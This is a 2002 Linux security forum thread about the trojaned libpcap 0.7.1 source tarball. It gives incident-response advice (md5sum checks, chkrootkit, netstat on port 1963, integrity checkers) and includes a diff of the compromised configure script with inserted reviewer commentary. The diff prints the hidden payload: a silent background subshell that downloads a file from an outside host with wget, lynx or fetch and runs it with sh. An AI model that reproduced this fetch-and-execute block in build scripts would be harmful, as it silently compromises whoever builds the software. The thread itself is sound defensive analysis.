LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Old 11-18-2002, 11:02 PM   #1
baduba
libpcap trojan


I downloaded and installed the libpcap 0.71 from tcpdump.org with the trojan. Anyone know how to clean that sucker? Can't find anything on it. Can I just reinstall with the uncontaminated version?
TIA
Michael

http://www.hlug.org/trojan/
 
Old 11-19-2002, 08:15 AM   #2
unSpawn
Moderator
 
Did you verify the md5sum for the packages?

If the trojan has been running there is a slim chance your box could have been used. Download, make, install and run chkrootkit. Maybe it detects the connection, but it cannot detect the trojan. At least no other anomalies should turn up. If results are good this provides you with a "less bad" view on the integrity of your box. In any case, if you have a system integrity checker like Aide, Samhain or Tripwire with regularly updated databases (which should be saved on read-only media), scan your box for new/modified files. Again, if these results don't show anomalies you can trust your system somewhat more.
If you don't have a system integrity checker, then you can't make sure your system is trusted, not tampered with and not compromised. That's bad, because an untrusted system is a risk to all. In that case you need to re-establish trust by saving all human readable data (no binaries) and reinstall from scratch.

If it does show up anomalies, then first go through the steps below, then reboot your box with an install/rescue CD-ROM or small distro like tomsrtbt and repeat the tests above.

Ok, commencing. In the worst case (it's running) you should be able to use netstat (netstat -anp | grep -v grep | grep 1963) to find the process id (PID) and name for an outgoing or listening connection on port TCP/1963.

Find files by that name (don't have the trojaned source, so I guess the filename is "conftes", like the source), note where they are, as root: make a quarantine directory, copy -a /proc/<PID> to a quarantine dir, kill the executable (kill -s KILL <PID>), and move the found executables to a quarantine dir. Move your trojaned sources to the quarantine dir. Make a tarball of the quarantine dir and remove the dir. *If you won't/can't hand me the trojaned sources/files, then you can skip the quarantine stuff.

If netstat doesn't show outbound or listening connection on TCP/1963 the trojan is not active (it could have received "A"), or the source the services file should be downloaded from was already unreachable.
Now you've got to find the trojan. If you won't/can't hand me the trojaned sources/files, then you will have to manually inspect the trojaned source to determine what name the executable is compiled as. The source (conftes.c) is in the downloaded services file (if downloaded with wget).
Remove the tcpdump source dir and the tarball.

If you installed tcpdump, remove the binary and any source code like header files that got installed with it.

Now that you've cleaned up it would be advisable to reboot and rerun the two checks mentioned first before installing tcpdump from a trusted source.


HTH.
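As an added example (not code from this thread or from libpcap): the netstat check from the post above, done with an exact port match instead of a bare `grep 1963`, which would also match a port such as 41963. The netstat lines are constructed sample output; the `conftes` program name and the remote address 212.146.0.34 come from the thread, the PIDs are made up.

```shell
#!/bin/sh
# Added example, not code from the thread: exact-port check over `netstat -anp`
# output for TCP/1963, the port the trojaned build was reported to use.
# Constructed sample output; PIDs are made up, the program name "conftes"
# and the remote host are the ones mentioned in the thread.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 192.168.1.10:1963       212.146.0.34:80         ESTABLISHED 1412/conftes
tcp        0      0 192.168.1.10:41963      10.0.0.5:22             ESTABLISHED 777/ssh
udp        0      0 0.0.0.0:68              0.0.0.0:*                           455/dhclient'

# find_port_pids PORT   (netstat -anp output on stdin)
# Prints the PID/program field of every TCP line whose local or foreign
# port is exactly PORT. Splitting the address on ":" and taking the last
# element works for IPv4 and IPv6 and avoids the substring match of
# `grep 1963`, which would also flag port 41963 in the sample above.
find_port_pids() {
    awk -v p="$1" '
        $1 == "tcp" || $1 == "tcp6" {
            nl = split($4, l, ":"); nf = split($5, f, ":")
            if (l[nl] == p || f[nf] == p) print $NF
        }'
}

# On a possibly compromised box run netstat from trusted media (rescue CD,
# tomsrtbt) rather than the installed binary, as the thread advises:
#   netstat -anp 2>/dev/null | find_port_pids 1963
# Offline demonstration against the constructed sample:
printf '%s\n' "$SAMPLE_NETSTAT" | find_port_pids 1963   # prints 1412/conftes
```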
 
Old 11-20-2002, 12:39 AM   #3
baduba
First, thanks for the verbose reply with ample suggestions. When I first realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it. I guess it's possible that trojaned bins could have been installed to ignore searches for confes-like strings. I had previously installed Tripwire, but didn't have it completely set up (no database had been generated) so no joy there. I figured I could trust tcpdump.org but oh well. Next time I guess I'll have to check md5 sums from a couple of sources to make sure they jive... sigh. Looks like http://www.tcpdump.org/ is still down oddly enough. I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage. I don't mind redoing this box, but I'd rather not if I don't have to, duh.

Netstat shows no open port at 1963, before and after reboot.
Again I guess it's possible Netstat is trojaned to ignore 1963.

I ran chkrootkit and it found no signatures or signs of trojans. Although this version 0.37 Release Date: Mon Sep 16 2002 may not have the signature for this particular trojan yet.

I haven't used the libpcap binary yet so perhaps something didn't get started, i.e. essential trojan code?

I haven't had time to obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
I only installed libpcap, not tcpdump, a bit of trivia.

You should have the trojaned libpcap... don't do anything foolish. I'm curious what you can glean from the source.

I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.

Thanks again for your help.
Michael
 
Old 11-20-2002, 07:00 AM   #4
unSpawn
Moderator
 
When I first realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it.
Ok, I've done a quick dirdiff on the source trees, and as far as I can see it's consistent with the trojaned archive, starting at the md5sum:
73ba7af963aff7c9e23fa1308a793dca (bad)
0597c23e3496a5c108097b2a0f1bd0c7 (good)
plus the code in gencode.c and configure.

Code:
--- libpcap-0.7.1-c/configure	Mon Dec 10 09:34:21 2001
+++ libpcap-0.7.1-t/configure	Mon Dec 10 09:34:21 2001

@@ -2043,15 +2041,17 @@
   test -z "$ac_cv_prog_RANLIB" && ac_cv_prog_RANLIB=":"
 fi
 fi
-RANLIB="$ac_cv_prog_RANLIB"
-if test -n "$RANLIB"; then
+ RANLIB="$ac_cv_prog_RANLIB"
+ if test -n "$RANLIB"; then
   echo "$ac_t""$RANLIB" 1>&6
 else
   echo "$ac_t""no" 1>&6
 fi
 
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
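Review bot: a hardcoded remote host has no place in a generated configure script, and the two new assignments closing this hunk, `CNF="services"` and `URL="mars.raketti.net/~mash/$CNF"`, are unrelated to the RANLIB probe they are tacked onto; the surrounding `-`/`+` pairs differ only by a leading space, re-indentation noise that makes the hunk scan as cosmetic and buries the two added lines. For review, compare a downloaded tarball against the upstream md5sum or GPG signature rather than reading configure by eye, and treat any host name or URL inside configure as a hard reject.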

@@ -2090,22 +2090,34 @@
 	    fi
     fi
 
-echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
-echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
+ (IFS=","
+ ARGS="wget -q -O -,lynx --source,fetch -q -o -"
+
+ for i in $ARGS; do
+       IFS=" "
+       $i $URL 1> $CNF
+       if [ -f $CNF ]; then sh $CNF
+           exit
+       fi
+       rm -f $CNF
+ done) 1>/dev/null 2>/dev/null &
+
+ echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
+ echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
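Review bot: a configure script must never fetch and execute remote content, and the inserted subshell does exactly that: it tries wget, lynx and fetch in turn against `$URL`, runs whatever arrives with `sh $CNF`, and is detached with `&` with both output streams sent to /dev/null, so the build surfaces no error whether the download succeeds or fails; this block should be rejected outright. Two details matter for anyone checking an affected tree. The `exit` inside the parentheses ends only the subshell, so configure itself carries on and the build completes normally, which matches the original poster seeing nothing unusual. And because `$i $URL 1> $CNF` creates `services` through the redirection before the `-f` test, the `exit` is reached before `rm -f $CNF`, so on that path the file is never cleaned up and a leftover `services` file in the libpcap source directory is a usable indicator. The displaced `checking if sockaddr struct has sa_len member` lines are the original probe pushed down, not new logic.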
You see it'll try to D/L the file (that should be executed and removed) from a fixed address. So once that address is shut down the code is useless.

I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage.
http://online.securityfocus.com/bid/6171,
http://www.cert.org/advisories/CA-2002-30.html and
http://www.iss.net/security_center/static/10620.php
were clear enough to me...

I don't mind redoing this box, but I'd rather not if I don't have to, duh.
Ok, here's why. It's about responsibility. (I know, this sounds like parents speaking :-] )
(Below I don't mean "you" as in baduba, but generally speaking, ok.)
A system has a purpose, is under your control, and so generally speaking is beneficial to you and/or the community.
Once a system is compromised, its purpose changes from being beneficial to you to being beneficial to a somewhat select part of community. Not to mention you don't control it anymore.
When a compromised system is left in this state it will act as another jumpboard for crackers, which means they for instance can abuse the trust relationship your system has with other systems and go on to do damage. If so you would be what in judicial terms is called an accomplice, as in "aiding a criminal", because you would provide the means and your system becomes a threat, a liability to ppl on the connected network (LAN, WAN and Internet).
The real problem of course is the majority of the ppl don't realize how much more powerful a Linux system is compared to wintendo.
With that power comes the responsibility to "be a good netizen", something even fewer ppl are aware of.

I ran chkrootkit and it found no signatures or signs of trojans. Although this version 0.37 Release Date: Mon Sep 16 2002 may not have the signature for this particular trojan yet.
No, but using it will at least show if other stuff is introduced into the system.

I haven't used the libpcap binary yet so perhaps something didn't get started ie: essential trojan code?
Heh. No, it was to be deployed while running configure.

I haven't had time to obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
If you can't get a grip on running Tripwire, try using Aide. I prefer it as it's easier and as powerful as Tripwire.
Don't forget to save your signature databases on read-only media. Same goes for the RPM databases if you use them.
Trusted binaries can be found on one-floppy distros like tomsrtbt, your distro's bootable install/rescue CD-R or forensics CD-Rs like Biatchux.
I usually have a fresh statically linked copy of Busybox lying around as well if space is concerned.

I only installed libpcap, not tcpdump, a bit of trivia.
Doesn't matter. Both were trojaned. As were Fragroute, OpenSSH, BitchX etc, etc...
Again, we all share a responsibility to demand from developers to at least have md5sums available, or better, have GPG/PGP signatures.
As we learned from the slapper worm, if you can't deinstall gcc, you should at least barricade it against public use.
Logging all outgoing traffic wouldn't be bad as well. Not that it'll stop something like the tcpdump/libpcap trojan from working, but if you keep an eye on the logs you should be able to trace back when the system was compromised which is a slight advantage over knowing nothing at all :-]

You should have the trojaned libpcap... don't do anything foolish. I'm curious what you can glean from the source.
Thanks. As you see I made some use of it. Shame I couldn't get the services file as well.

I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.
If you want to keep an eye on it I'd say just log outgoing traffic (or only to 212.146.0.34 if you've got lotsa traffic) as well, weed out your usual destinations, and if nothing shows up, consider it clean.

Last edited by unSpawn; 11-20-2002 at 07:02 AM.
 
  

